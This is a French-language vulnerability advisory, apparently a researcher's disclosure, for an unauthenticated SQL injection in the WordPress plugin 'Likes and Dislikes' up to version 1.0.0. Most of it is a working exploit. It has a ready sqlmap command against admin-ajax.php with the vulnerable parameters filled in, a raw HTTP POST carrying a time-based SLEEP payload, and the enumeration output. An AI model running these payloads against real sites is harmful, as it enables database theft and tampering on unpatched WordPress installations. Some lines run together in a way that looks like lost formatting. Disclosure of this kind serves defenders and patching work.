
Le plugin WordPress Likes and Dislikes <= 1.0.0 est vulnérable à SQL Injection
Découvert par : Khaled_Alenazi (Nxploited)
Publié le : 27 mai 2025
Le plugin Likes and Dislikes pour WordPress est vulnérable à une injection SQL via le paramètre post dans toutes les versions jusqu'à et y compris la 1.0.0.
En raison d'un escaping insuffisant et du manque de requêtes préparées, des attaquants non authentifiés peuvent injecter du SQL brut dans les requêtes backend, entraînant une fuite ou une manipulation des données.
post/wp-admin/admin-ajax.phpsqlmap -u "http://TARGET/wp-admin/admin-ajax.php" \
--data "action=my_likes_dislikes_action&post=1&state=like" \
--method POST --risk 3 --level 5 --batch --time-sec=5 --dbs
Cette commande confirme le point d'injection et énumère les bases de données en utilisant une technique basée sur le temps.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: nxploit.ddev.site
Content-Type: application/x-www-form-urlencoded
Connection: close
action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like
Énumération SQLMap :
aveugle basée sur booléen et aveugle basée sur le temps.db, test, information_schema.
Vérification manuelle avec Burp Suite :
15 secondes, indiquant une injection réelle.
post.Ce contenu est fourni à des fins éducatives et de recherche uniquement.
L'auteur ne cautionne pas les activités malveillantes ou l'exploitation de systèmes sans autorisation explicite.
Khaled_Alenazi (Nxploited)